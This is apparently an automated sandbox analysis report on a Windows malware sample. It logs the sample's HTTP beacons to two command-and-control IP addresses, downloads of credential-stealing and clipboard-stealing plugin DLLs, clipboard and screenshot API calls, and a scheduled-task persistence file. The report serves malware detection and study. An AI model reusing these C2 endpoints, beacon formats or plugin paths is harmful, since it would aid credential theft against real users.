Source: global traffic	HTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.148Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
Source: global traffic	HTTP traffic detected: POST /7vhfjke3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.147Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
Source: global traffic	HTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.148Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /7vhfjke3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.147Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /7vhfjke3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.147Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
Source: global traffic	HTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.148Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
Source: global traffic	HTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.148Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /7vhfjke3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.147Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.148Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
Source: global traffic	HTTP traffic detected: POST /7vhfjke3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.147Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
Source: global traffic	HTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.148Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: Joe Sandbox View	ASN Name: KLNOPT-ASFI KLNOPT-ASFI
Source: Joe Sandbox View	ASN Name: KLNOPT-ASFI KLNOPT-ASFI

Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49738 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49743 -> 185.81.68.147:80

Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.148
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.148
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.148
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.148
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147

Source: C:\Users\user\Desktop\tOuVwTJrau.exe

Code function: 0_2_002F2710 recv,recv,recv,recv,

0_2_002F2710

Source: global traffic	HTTP traffic detected: GET /7vhfjke3/Plugins/cred64.dll HTTP/1.1Host: 185.81.68.147
Source: global traffic	HTTP traffic detected: GET /7vhfjke3/Plugins/clip64.dll HTTP/1.1Host: 185.81.68.147

Source: unknown

HTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.148Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/
Source: Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/7vhfjke3/Plugins/clip64.dll
Source: Gxtuum.exe, 00000001.00000002.2924314576.0000000000DCC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/7vhfjke3/Plugins/cred64.dll
Source: rundll32.exe, 00000010.00000002.2924026197.000000000343F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.2924026197.00000000033FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/7vhfjke3/index.php
Source: Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/7vhfjke3/index.php$
Source: rundll32.exe, 00000004.00000002.2137636900.0000021E06674000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/7vhfjke3/index.php&
Source: Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/7vhfjke3/index.php1
Source: rundll32.exe, 00000010.00000002.2924026197.000000000343F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/7vhfjke3/index.php6
Source: rundll32.exe, 0000000C.00000002.2924024643.00000000030FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/7vhfjke3/index.php8
Source: rundll32.exe, 00000004.00000002.2137636900.0000021E06647000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2137915053.0000021E08558000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2139039195.000002583B470000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2138710552.0000025839606000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/7vhfjke3/index.php?wal=1
Source: rundll32.exe, 00000006.00000002.2139039195.000002583B470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/7vhfjke3/index.php?wal=1H;0
Source: rundll32.exe, 00000004.00000002.2137915053.0000021E08558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/7vhfjke3/index.php?wal=1f
Source: rundll32.exe, 00000006.00000002.2139039195.000002583B470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/7vhfjke3/index.php?wal=1ies.
Source: rundll32.exe, 00000004.00000002.2137915053.0000021E08558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/7vhfjke3/index.php?wal=1tesH
Source: rundll32.exe, 00000006.00000002.2139039195.000002583B470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/7vhfjke3/index.php?wal=1urn
Source: rundll32.exe, 00000010.00000002.2924026197.000000000343F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/7vhfjke3/index.phpE
Source: Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/7vhfjke3/index.phpX
Source: Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/7vhfjke3/index.phpa
Source: Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/7vhfjke3/index.phpbf198
Source: rundll32.exe, 00000010.00000002.2924026197.000000000343F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/7vhfjke3/index.phpo
Source: rundll32.exe, 0000000C.00000002.2924024643.00000000030FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/7vhfjke3/index.phps
Source: rundll32.exe, 0000000C.00000002.2924024643.00000000030FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/7vhfjke3/index.phpu
Source: Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/7vhfjke3/index.phpw
Source: Gxtuum.exe, 00000001.00000002.2924314576.0000000000DCC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/7vhfjke3/index.phpz#29
Source: Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/ows
Source: Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/
Source: rundll32.exe, 00000010.00000002.2924026197.0000000003459000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS
Source: rundll32.exe, 0000000C.00000002.2924024643.00000000030BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php
Source: Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php&
Source: rundll32.exe, 0000000C.00000002.2924024643.00000000030BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php0
Source: Gxtuum.exe, 00000001.00000002.2924314576.0000000000DCC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php98
Source: Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php:
Source: rundll32.exe, 00000006.00000002.2138710552.0000025839606000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php?R
Source: rundll32.exe, 00000004.00000002.2137636900.0000021E06647000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2137915053.0000021E08558000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2139039195.000002583B470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1
Source: rundll32.exe, 00000006.00000002.2139039195.000002583B470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1b
Source: rundll32.exe, 00000006.00000002.2139039195.000002583B470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1eB
Source: rundll32.exe, 00000006.00000002.2138710552.0000025839606000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1h
Source: rundll32.exe, 00000004.00000002.2137915053.0000021E08558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1rnN
Source: rundll32.exe, 00000004.00000002.2137915053.0000021E08558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1t
Source: rundll32.exe, 00000004.00000002.2137915053.0000021E08558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1z
Source: Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpF
Source: Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpJ
Source: rundll32.exe, 00000010.00000002.2924026197.00000000033FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpK
Source: rundll32.exe, 00000004.00000002.2137636900.0000021E06674000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpL
Source: Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpR
Source: rundll32.exe, 0000000C.00000002.2924024643.0000000003126000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpXx/M
Source: Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpZ
Source: Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpb
Source: Gxtuum.exe, 00000001.00000002.2924314576.0000000000DCC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpbbf198
Source: Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpd7
Source: Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpded
Source: Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp, Gxtuum.exe, 00000001.00000002.2924314576.0000000000D9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpf
Source: rundll32.exe, 00000010.00000002.2924026197.00000000033FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpg
Source: rundll32.exe, 0000000C.00000002.2924024643.00000000030BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phph
Source: rundll32.exe, 00000010.00000002.2924026197.00000000033FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpm
Source: Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpn
Source: Gxtuum.exe, 00000001.00000002.2924314576.0000000000DCC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpndows
Source: Gxtuum.exe, 00000001.00000002.2924314576.0000000000DCC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpoded
Source: rundll32.exe, 00000010.00000002.2924026197.00000000033FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phps
Source: Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpv
Source: Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpvhfjke3/index.php
Source: rundll32.exe, 0000000C.00000002.2924024643.00000000030BA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.2924026197.00000000033FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/Fvu5jh4DbS/index.php
Source: Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/SysWOW64
Source: rundll32.exe, 00000006.00000002.2139039195.000002583B470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/X
Source: rundll32.exe, 00000004.00000002.2137915053.0000021E08558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/ta;
Source: Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/wsys
Source: powershell.exe, 0000000B.00000002.2008936474.0000018FD6DE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2008958596.000002499E3A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2065342904.00000249ACB41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000D.00000002.2008958596.000002499CCF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000B.00000002.2008936474.0000018FD5739000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2008958596.000002499CCF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 0000000B.00000002.2008936474.0000018FD5511000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2008958596.000002499CAD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000B.00000002.2008936474.0000018FD5739000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2008958596.000002499CCF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000D.00000002.2008958596.000002499CCF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000B.00000002.2008936474.0000018FD5511000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2008958596.000002499CAD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000D.00000002.2008958596.000002499CCF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2084465278.00000249B4DAF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2083831984.00000249B4DA2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2008958596.000002499E013000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 0000000B.00000002.2008936474.0000018FD6B3D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2008958596.000002499E013000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
Source: powershell.exe, 0000000D.00000002.2065342904.00000249ACB41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000D.00000002.2065342904.00000249ACB41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000D.00000002.2065342904.00000249ACB41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000D.00000002.2008958596.000002499CCF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000B.00000002.2008936474.0000018FD6DE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2008958596.000002499E3A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2065342904.00000249ACB41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 12_2_6C0531B0 OpenClipboard,GetClipboardData,GlobalLock,WideCharToMultiByte,WideCharToMultiByte,GlobalUnlock,CloseClipboard,

12_2_6C0531B0

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 12_2_6C0531B0 OpenClipboard,GetClipboardData,GlobalLock,WideCharToMultiByte,WideCharToMultiByte,GlobalUnlock,CloseClipboard,

12_2_6C0531B0

Source: C:\Users\user\Desktop\tOuVwTJrau.exe

Code function: 0_2_002E61F0 RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegQueryInfoKeyW,RegEnumValueA,RegCloseKey,GdiplusStartup,GetDC,RegGetValueA,RegGetValueA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,RegGetValueA,GetSystemMetrics,GetSystemMetrics,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,GdipDisposeImage,GdiplusShutdown,GetUserNameA,LookupAccountNameA,GetSidIdentifierAuthority,GetSidSubAuthorityCount,GetSidSubAuthority,GetSidSubAuthority,

0_2_002E61F0

Source: C:\Users\user\Desktop\tOuVwTJrau.exe

File created: C:\Windows\Tasks\Gxtuum.job

Jump to behavior

Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Code function: 0_2_002E61F0	0_2_002E61F0
